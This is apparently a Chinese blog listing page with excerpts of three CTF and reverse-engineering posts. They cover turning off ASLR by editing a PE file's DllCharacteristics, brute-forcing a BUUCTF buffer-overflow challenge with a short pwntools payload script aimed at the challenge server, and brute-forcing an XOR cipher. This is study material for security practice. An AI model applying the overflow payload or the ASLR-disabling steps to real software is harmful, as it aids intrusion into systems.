学习
R0g
先天八卦
展开
-
通过更改DllCharacteristics关闭ASLR地址空间随机化
前言:在更改PE文件时,通过x32dbg调试发现imagebase并不是0x400000h,而是变化的值,于是了解到ASLR的概念工具:010Editor、x64dbg、PE知识步骤:1,在PE文件中定位到DLLCharacteristic结构体,其值为0x8410,换算到二进制属性如下图2,讲其中的DYNAMIC_BASE属性改为0,也就是将其改为0x81003,再次运行程序,通过x32dbg调试发现EntryPoint变成了4开头的...原创 2021-04-28 16:58:44 · 810 阅读 · 0 评论 -
针对简单Pwn溢出题的爆破
爆破大法好例子:BUUCTF rip首先得到源程序pwn1file pwn1checksec pwn1啥也没有,很好然后拖到IDA64分析一波发现漏洞函数,地址为 0x401186 ,很好祭出脚本,开始爆破from pwn import *def brute(i): payload=b'a'*i+p64(0x401186) p=remote('node3.buuoj.cn',28460) p.sendline(payload) p.interact原创 2021-04-19 01:20:43 · 991 阅读 · 0 评论 -
XOR解密思路------爆破
例子:2018 护网杯 迟来的签到题http://www.bmzclub.cn/challenges#2018%20%E6%8A%A4%E7%BD%91%E6%9D%AF%20%E8%BF%9F%E6%9D%A5%E7%9A%84%E7%AD%BE%E5%88%B0%E9%A2%98下载压缩包后发现像是base64加密字符串给了提示 easy_xor???故直接祭出脚本爆破python easy_xor.py > result && strings result |grep原创 2021-04-13 01:31:55 · 1745 阅读 · 4 评论